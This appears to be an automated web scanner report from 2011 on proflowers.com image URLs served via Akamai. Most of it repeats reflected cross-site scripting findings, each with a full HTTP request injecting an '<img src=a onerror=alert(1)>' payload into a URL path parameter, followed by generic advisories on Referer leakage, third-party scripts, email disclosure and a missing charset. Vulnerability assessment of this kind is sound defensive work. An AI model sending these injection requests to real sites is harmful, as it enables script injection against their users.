GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF3f820<img%20src%3da%20onerror%3dalert(1)>765038f592b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a2e58<img%20src%3da%20onerror%3dalert(1)>5024d153cf9 was submitted in the REST URL parameter 9. This input was echoed as a2e58<img src=a onerror=alert(1)>5024d153cf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PFa2e58<img%20src%3da%20onerror%3dalert(1)>5024d153cf9?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5a67f<img%20src%3da%20onerror%3dalert(1)>9bcc720745 was submitted in the REST URL parameter 9. This input was echoed as 5a67f<img src=a onerror=alert(1)>9bcc720745 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF5a67f<img%20src%3da%20onerror%3dalert(1)>9bcc720745?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c866d<img%20src%3da%20onerror%3dalert(1)>154ac83e716 was submitted in the REST URL parameter 9. This input was echoed as c866d<img src=a onerror=alert(1)>154ac83e716 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tnc866d<img%20src%3da%20onerror%3dalert(1)>154ac83e716?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5603a<img%20src%3da%20onerror%3dalert(1)>7a612d79cef was submitted in the REST URL parameter 9. This input was echoed as 5603a<img src=a onerror=alert(1)>7a612d79cef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF5603a<img%20src%3da%20onerror%3dalert(1)>7a612d79cef?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9c7cf<img%20src%3da%20onerror%3dalert(1)>fc11b4a6f5d was submitted in the REST URL parameter 9. This input was echoed as 9c7cf<img src=a onerror=alert(1)>fc11b4a6f5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF9c7cf<img%20src%3da%20onerror%3dalert(1)>fc11b4a6f5d?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5b4b5<img%20src%3da%20onerror%3dalert(1)>e71fc12cb50 was submitted in the REST URL parameter 9. This input was echoed as 5b4b5<img src=a onerror=alert(1)>e71fc12cb50 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF5b4b5<img%20src%3da%20onerror%3dalert(1)>e71fc12cb50?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 3a285<img%20src%3da%20onerror%3dalert(1)>3b6606d8bca was submitted in the REST URL parameter 9. This input was echoed as 3a285<img src=a onerror=alert(1)>3b6606d8bca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF3a285<img%20src%3da%20onerror%3dalert(1)>3b6606d8bca?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=300&hei=350 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357?viewpos=1&trackingpgroup=HPM&tile=hmpg_podB&Ref=HomeNoRef&PageSplit= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4695f<img%20src%3da%20onerror%3dalert(1)>bf298cafba7 was submitted in the REST URL parameter 9. This input was echoed as 4695f<img src=a onerror=alert(1)>bf298cafba7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF4695f<img%20src%3da%20onerror%3dalert(1)>bf298cafba7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4323c<img%20src%3da%20onerror%3dalert(1)>4e98c60444e was submitted in the REST URL parameter 9. This input was echoed as 4323c<img src=a onerror=alert(1)>4e98c60444e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF4323c<img%20src%3da%20onerror%3dalert(1)>4e98c60444e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload ee8b1<img%20src%3da%20onerror%3dalert(1)>e4f2ea6dc57 was submitted in the REST URL parameter 9. This input was echoed as ee8b1<img src=a onerror=alert(1)>e4f2ea6dc57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PFee8b1<img%20src%3da%20onerror%3dalert(1)>e4f2ea6dc57?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b6d74<img%20src%3da%20onerror%3dalert(1)>d87e77dd9b7 was submitted in the REST URL parameter 9. This input was echoed as b6d74<img src=a onerror=alert(1)>d87e77dd9b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PFb6d74<img%20src%3da%20onerror%3dalert(1)>d87e77dd9b7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 66259<img%20src%3da%20onerror%3dalert(1)>99e8ab47db7 was submitted in the REST URL parameter 9. This input was echoed as 66259<img src=a onerror=alert(1)>99e8ab47db7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF66259<img%20src%3da%20onerror%3dalert(1)>99e8ab47db7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload def66<img%20src%3da%20onerror%3dalert(1)>193b0e5b757 was submitted in the REST URL parameter 9. This input was echoed as def66<img src=a onerror=alert(1)>193b0e5b757 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQdef66<img%20src%3da%20onerror%3dalert(1)>193b0e5b757?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a9cd3<img%20src%3da%20onerror%3dalert(1)>2550109adfe was submitted in the REST URL parameter 9. This input was echoed as a9cd3<img src=a onerror=alert(1)>2550109adfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tna9cd3<img%20src%3da%20onerror%3dalert(1)>2550109adfe?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Request
GET /7/1128/497/0001/www.proflowers.com/ HTTP/1.1 Host: a1128.g.akamai.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 84065 Cache-Control: private, max-age=0 Date: Fri, 11 Feb 2011 20:56:16 GMT Connection: close
<noscript> <div class="splashBox"> <font style="font-size:16pt;color: #fff786;margin: 10px;">We’re Sorry - </font> <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha ...[SNIP]... </script>
The following email address was disclosed in the response:
id@Zs.tc
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Request
GET /7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.02.04.2 HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Content-Length: 30838 Content-Type: application/x-javascript Last-Modified: Thu, 01 Oct 2009 20:57:47 GMT Accept-Ranges: bytes ETag: "6c7b2d4d942ca1:31b9" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Fri, 11 Feb 2011 18:32:45 GMT Connection: close
/* SiteCatalyst code version: H.15.1. Copyright 1997-2006 Omniture, Inc. More info available at http://www.omniture.com */ /* Specify the Report Suite ID(s) to track here */ var s_account = "profl ...[SNIP]... s=s.vs(sed)`5trk`F@s)#1=s.mr(@y,(vt#Ot`Zvt)`o+s.hav()+q+(qs?qs:s.rq(^3)),0,id,ta);qs`i;`Wm('t')`5s.p_r)s.p_r(`L`a`i}^F(qs);^Z`s(@r;`l@r`b^1,`G$D1',vb`H''`" +"5s.pg)`I^u$w=`I^ueo=`I^u`V`x=`I^u`V^a`i`5!id@Zs.tc^vtc=1;s.flush`T()}`2#1`Ctl`0o,t,n,vo`1;@T=$4o`L`V^a=t;s.`V`x=n;s.t(@r}`5pg){`I^uco`0o){`K^q\"_\",1,#T`2$4o)`Cwd^ugs`0u$S`K^q#41,#T`2s.t()`Cwd^udc`" +"0u$S`K^q#4#T`2s.t()}}@4=(`I`N`g`8`4$2s@l0`Ld=^9;s ...[SNIP]...
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
Request
GET /favicon.ico HTTP/1.1 Host: a1128.g.akamai.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 208 Expires: Fri, 11 Feb 2011 18:35:16 GMT Date: Fri, 11 Feb 2011 18:35:16 GMT Connection: close
<HTML><HEAD> <TITLE>Invalid URL</TITLE> </HEAD><BODY> <H1>Invalid URL</H1> The requested URL "/favicon.ico", is invalid.<p> Reference #9.56ce8f18.1297449316.e070737 </BODY> ...[SNIP]...